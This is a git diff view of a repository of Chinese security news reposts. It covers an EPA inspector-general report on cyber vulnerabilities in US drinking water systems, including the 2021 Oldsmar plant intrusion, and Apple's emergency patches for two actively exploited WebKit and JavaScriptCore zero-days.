||||||
|
|
||||||

|
|
||||||
|
|
||||||
|
|
||||||
安全性缺陷评估涵盖了五个网络安全类别,即电子邮件安全、IT卫生、漏洞、对抗性威胁和恶意活动,并根据潜在影响对识别的漏洞从低到高进行评分。
|
安全性缺陷评估涵盖了五个网络安全类别,即电子邮件安全、IT卫生、漏洞、对抗性威胁和恶意活动,并根据潜在影响对识别的漏洞从低到高进行评分。
|
||||||
|
|
||||||
|
|
||||||
数据显示,97个系统存在关键或高风险漏洞,可能导致服务瘫痪或数据泄露,另有211个系统存在可被外部访问的开放端口,尽管风险较低,但若不及时修复,仍有可能被利用。
|
数据显示,97个系统存在关键或高风险漏洞,可能导致服务瘫痪或数据泄露,另有211个系统存在可被外部访问的开放端口,尽管风险较低,但若不及时修复,仍有可能被利用。
|
||||||
|
|
||||||
|
|
||||||
OIG进一步表示,“如果网络攻击者利用我们在被动评估中识别的网络安全漏洞,他们可能会中断服务或对饮用水基础设施造成无法弥补的物理损害。”
|
OIG进一步表示,“如果网络攻击者利用我们在被动评估中识别的网络安全漏洞,他们可能会中断服务或对饮用水基础设施造成无法弥补的物理损害。”
|
||||||
|
|
||||||
|
|
||||||
EPA还会为每个被调查对象绘制系统的数字足迹,涵盖用于收集、泵送、处理、储存和分配饮用水的基础设施,分析超过75000个IP和14400个域名。
|
EPA还会为每个被调查对象绘制系统的数字足迹,涵盖用于收集、泵送、处理、储存和分配饮用水的基础设施,分析超过75000个IP和14400个域名。
|
||||||
|
|
||||||
|
|
||||||
该报告还总结了EPA在网络安全方面的不足。EPA缺乏一个集中式的事件报告系统,目前依赖美国网络安全和基础设施安全局(CISA)进行此类报告,这明显限制了威胁发生时的及时沟通与协调响应能力。此外还有饮用水系统的管理人员缺乏足够的网络安全培训,导致系统容易被黑客攻击;许多供水系统陈旧过时,缺乏维护,进一步增加了网络安全风险。
|
该报告还总结了EPA在网络安全方面的不足。EPA缺乏一个集中式的事件报告系统,目前依赖美国网络安全和基础设施安全局(CISA)进行此类报告,这明显限制了威胁发生时的及时沟通与协调响应能力。此外还有饮用水系统的管理人员缺乏足够的网络安全培训,导致系统容易被黑客攻击;许多供水系统陈旧过时,缺乏维护,进一步增加了网络安全风险。
|
||||||
|
|
||||||
|
|
||||||
针对上述问题,EPA计划利用饮用水州循环基金和大中型饮用水系统基础设施恢复力与可持续性计划,为公共供水系统提供培训、技术援助和财务支持,以加强其网络安全防护能力。
|
针对上述问题,EPA计划利用饮用水州循环基金和大中型饮用水系统基础设施恢复力与可持续性计划,为公共供水系统提供培训、技术援助和财务支持,以加强其网络安全防护能力。
|
||||||
|
|
||||||
|
|
||||||
事实上,美国饮用水系统一直存在严重安全风险。2021年2月,黑客通过远程控制软件TeamViewer入侵佛罗里达州奥兹玛市自来水厂的电脑系统,试图将氢氧化钠的含量从百万分之100大幅提高到百万分之111000,这直接达到了“水质危险”的程度。
|
事实上,美国饮用水系统一直存在严重安全风险。2021年2月,黑客通过远程控制软件TeamViewer入侵佛罗里达州奥兹玛市自来水厂的电脑系统,试图将氢氧化钠的含量从百万分之100大幅提高到百万分之111000,这直接达到了“水质危险”的程度。
|
||||||
|
|
||||||
|
|
||||||
由于员工及时发现并干预,没有对公众造成实际伤害。但FBI和特勤局介入调查后,议员马可·罗伯(Marco Rubio)要求FBI全力协助,将此案件视为国家安全问题。
|
由于员工及时发现并干预,没有对公众造成实际伤害。但FBI和特勤局介入调查后,议员马可·罗伯(Marco Rubio)要求FBI全力协助,将此案件视为国家安全问题。
|
||||||
|
|
||||||
|
再今年5月,EPA也曾警告说,超过70%的水系统不符合《安全饮用水法》,强调了严重性高的问题,例如使用默认密码和容易受到黑客攻击的认证系统,这些都大大降低了攻击者入侵的门槛。
|
||||||
|
|
||||||
在今年5月,EPA也曾警告说,超过70%的水系统不符合《安全饮用水法》,强调了严重性高的问题,例如使用默认密码和容易受到黑客攻击的认证系统,这些都大大降低了攻击者入侵的门槛。
|
为此,EPA要求在各州进行公共供水系统的卫生检查时,强制纳入网络安全评估。供水系统运营商也需要制定适当的事件响应计划,以便在检测和分析网络事件时能够快速、准确地报告事件并收集数据进行分析。对此,美国联邦机构发布了指导意见,帮助供水和废水处理系统运营商更好地应对网络攻击。EPA也与CISA、FBI联合发布指南:EPA与美国网络安全和基础设施安全局(CISA)及美国联邦调查局(FBI)联合发布了一项网络安全实践指南,旨在帮助城市供水和废水处理领域的企业组织提高网络安全弹性和事件响应能力。
|
||||||
|
> 参考来源:https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/
|
||||||
|
|
||||||
|
|
||||||
为此,EPA要求在各州进行公共供水系统的卫生检查时,强制纳入网络安全评估。供水系统运营商也需要制定适当的事件响应计划,以便在检测和分析网络事件时能够快速、准确地报告事件并收集数据进行分析。对此,美国联邦机构发布了指导意见,帮助供水和废水处理系统运营商更好地应对网络攻击。
|
> **文章来源:freebuf**
|
||||||
|
|
||||||
|
|
||||||
EPA也与美国网络安全和基础设施安全局(CISA)及美国联邦调查局(FBI)联合发布了一项网络安全实践指南,旨在帮助城市供水和废水处理领域的企业组织提高网络安全弹性和事件响应能力。
|
|
||||||
|
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
|
||||||
|
|
||||||
|
如侵权请私聊我们删文
|
||||||
|
|
||||||
|
|
||||||
编辑:陈十九
|
**END**
|
||||||
|
|
||||||
审核:商密君
|
|
||||||
|
|
||||||
**征文启事**
|
|
||||||
|
|
||||||
大家好,为了更好地促进同业间学术交流,商密君现开启征文活动,只要你对商用密码、网络安全、数据加密等有自己的独到见解和想法,都可以积极向商密君投稿,商密君一定将您的声音传递给更多的人。
|
|
||||||
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
来源:FreeBuf
|
|
||||||
|
|
||||||
注:内容均来源于互联网,版权归作者所有,如有侵权,请联系告知,我们将尽快处理。
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
点分享
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
点点赞
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
点在看
|
|
||||||
|
|
||||||
|
38
doc/苹果确认针对 macOS 系统的零日漏洞攻击.md
Normal file
38
doc/苹果确认针对 macOS 系统的零日漏洞攻击.md
Normal file
@ -0,0 +1,38 @@
|
|||||||
|
# 苹果确认针对 macOS 系统的零日漏洞攻击
|
||||||
|
原创 hackerson 黑客联盟l 2024-11-20 11:32
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
苹果已紧急推出重大的 macOS 和 iOS 安全更新,以修复两个已被利用的漏洞。
|
||||||
|
|
||||||
|
|
||||||
|
苹果在周二发布的一份公告中证实,这些漏洞由谷歌的威胁分析小组(TAG)发现,正在基于英特尔处理器的 macOS 系统上被积极利用。
|
||||||
|
|
||||||
|
|
||||||
|
按照惯例,苹果的安全响应团队并未提供所报告攻击的任何细节或失陷指标(IOC)来帮助防御者查找感染迹象。
|
||||||
|
|
||||||
|
|
||||||
|
**已修复漏洞的详细情况:**
|
||||||
|
|
||||||
|
|
||||||
|
CVE-2024-44308——JavaScriptCore—— 处理恶意构造的网页内容可能导致任意代码执行。苹果已知悉一份报告称,这个问题可能已在基于英特尔处理器的 Mac 系统上被积极利用。
|
||||||
|
|
||||||
|
|
||||||
|
CVE-2024-44309——WebKit—— 处理恶意构造的网页内容可能导致跨站脚本攻击。苹果已知悉一份报告称,这个问题可能已在基于英特尔处理器的 Mac 系统上被积极利用。
|
||||||
|
|
||||||
|
|
||||||
|
该公司敦促整个苹果生态系统的用户尽快安装紧急发布的 iOS 18.1.1、macOS Sequoia 15.1.1 以及旧版本的 iOS 17.7.2。
|
||||||
|
|
||||||
|
|
||||||
|
本月早些时候,朝鲜的加密货币窃贼再次被发现针对 macOS 用户发起一场新的恶意软件活动,该活动利用钓鱼邮件、虚假 PDF 应用程序以及一种新颖的技术来规避苹果的安全措施。
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
关注【**黑客联盟**】带你走进神秘的黑客世界
|
||||||
|
|
||||||
|
|
||||||
|
|
61
doc/苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞.md
Normal file
61
doc/苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞.md
Normal file
@ -0,0 +1,61 @@
|
|||||||
|
# 苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞
|
||||||
|
看雪学苑 看雪学苑 2024-11-20 10:06
|
||||||
|
|
||||||
|
> 苹果公司针对基于英特尔处理器的Mac系统发布了紧急安全更新,修复了两个被积极利用的零日漏洞。这些漏洞涉及macOS的JavaScriptCore和WebKit组件,可能允许攻击者通过恶意网页内容执行任意代码或发起跨站脚本攻击。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
苹果公司在11月19日发布了紧急安全更新,以修复两个零日漏洞,这些漏洞被用于针对基于英特尔处理器的Mac系统的攻击中。该公司在咨询报告中表示,已获悉有关该问题可能已被利用的报告。
|
||||||
|
|
||||||
|
|
||||||
|
这两个漏洞分别被追踪为CVE-2024-44308和CVE-2024-44309,它们存在于macOS的JavaScriptCore和WebKit组件中。JavaScriptCore的漏洞(CVE-2024-44308)允许攻击者通过恶意制作的Web内容实现远程代码执行,而WebKit的漏洞(CVE-2024-44309)则允许跨站点脚本(XSS)攻击。
|
||||||
|
|
||||||
|
|
||||||
|
苹果公司表示,这些安全漏洞已在macOS Sequoia 15.1.1中得到解决。由于iOS和iPadOS中也存在相同的组件,因此在iOS 17.7.2、iPadOS 17.7.2、iOS 18.1.1和iPadOS 18.1.1以及VisionOS 2.1.1中也修复了这些问题。
|
||||||
|
|
||||||
|
|
||||||
|
这两个漏洞是由谷歌威胁分析小组的Clément Lecigne和Benoît Sevens发现的,但苹果尚未提供有关如何利用这些漏洞的更多详细信息。凭借这两个漏洞的修复,苹果公司在2024年迄今已修复了6个零日漏洞。
|
||||||
|
|
||||||
|
|
||||||
|
苹果公司强烈建议所有用户立即安装最新的安全补丁,以确保设备的安全。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
资讯来源:bleepingcomputer
|
||||||
|
|
||||||
|
转载请注明出处和本文链接
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
﹀
|
||||||
|
|
||||||
|
﹀
|
||||||
|
|
||||||
|
﹀
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**球分享**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**球点赞**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**球在看**
|
||||||
|
|
||||||
|
****
|
||||||
|
****
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
戳
|
||||||
|
“阅读原文
|
||||||
|
”
|
||||||
|
一起来充电吧!
|
||||||
|
|
Loading…
x
Reference in New Issue
Block a user